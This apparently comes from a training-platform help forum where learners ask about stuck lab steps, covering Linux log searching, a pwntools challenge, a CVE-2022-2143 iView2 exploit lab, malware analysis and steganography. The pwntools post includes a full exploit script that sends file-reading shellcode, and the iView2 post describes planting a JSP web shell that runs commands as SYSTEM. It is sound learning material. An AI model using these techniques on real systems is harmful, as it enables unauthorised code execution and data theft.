Web Log Analysis: Ep.5 – Searching Web Server Logs using Linux CLI
Looking for some tips to help me get past step 1 (!) of this lab. I have tried to cs into Log-Files/ but nothing is returned, and the same for a cat command. I don't have experience with Linux but want to attempt this lab - maybe even some lab recommendations on how to get to a sufficient level with Linux would help? Thanks!!
Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immersivelabs/comments/1ap3tub/pwntools_ep_6_demonstrate_your_skills/) but it is still not working. Could you please help me with this if possible shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) is what I tried from pwn import * import struct # Start the challenge binary p = process("/opt/demonstrate-challenge") # Use the correct path # === Part 1: Solve Arithmetic Challenge === p.recvuntil(b"What is the sum of ") numbers = p.recvline().decode().strip().split(" and ") num1 = int(numbers[0]) num2 = int(numbers[1].split("?")[0]) print(f"[+] Solving: {num1} + {num2} = {num1 + num2}") p.sendline(str(num1 + num2)) # === Part 2: Solve Packing Challenge === p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n") values = p.recvline().decode().strip().split(" and ") val1 = int(values[0]) val2 =int(values[1]) print(f"[+] Packing values: {val1} and {val2}") payload = struct.pack("<II", val1, val2) p.send(payload) # === Part 3: Leak Address of parsing_check() === elf = ELF("/opt/demonstrate-challenge") # Load the ELF binary parsing_check_addr = elf.symbols['parsing_check'] # Get function address print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}") p.sendline(str(parsing_check_addr)) # === Part 4: Send Shellcode to Read /home/token-user/token.txt === file_path = '/home/token-user/token.txt' shellcode = shellcraft.cat2(file_path, 1, 40) # Pwntools shellcode shellcode += shellcraft.ret() # Ensure proper return assembled_shellcode = asm(shellcode) p.send(assembled_shellcode) # === Get Flag Output === response = p.recvall() print(response)
Web App Hacking (Lab series): CVE-2022-2143 (iView2)
Hello all, I have spent way to long trying to complete the iView2 exploit. I was expecting a text box on the page for command entry, but I cannot get anything like that. I have been able to send a post request to the NetworkServlet page using the provided exploit string and I know that the test.jsp is created because I can use the query parameter ?cmd=whoami and I get the mysqldump output showing "nt authority \system". I cannot get any other query parameters to execute, even simple ls or dir commands. I found y4er's blog post and everything I see in terms of the syntax of the exploit appears to be identical to the lab. Any directions/suggestions/hints would be greatly appreciated! Thanks in advance. J
Practical Malware Analysis: Static Analysis question 18
for finding the exact name of the executable file. After dynamically overriding the function as shown in the briefing I cant seem to find any meaningful creation of the filename matching the patter provided in sprintf. I am wondering if I should be overriding a different function? as I cant seem to find any meaningful leads when searching for references or traveling to the next data. I also cant seem to find any leads from searching specifically for local_104 and unaff_EDI references as well.
Historic Steganography Lab
I've been stuck on question 6 in the Stenography lab within the Historic Encryption upskill series. I'm not sure if I'm missing something within the command line or if the password/passphrase for the file is wrong. The password/passphrase is supposed to be "carnivale" Here are some screenshots to help zero in where I'm at. Thanks all!
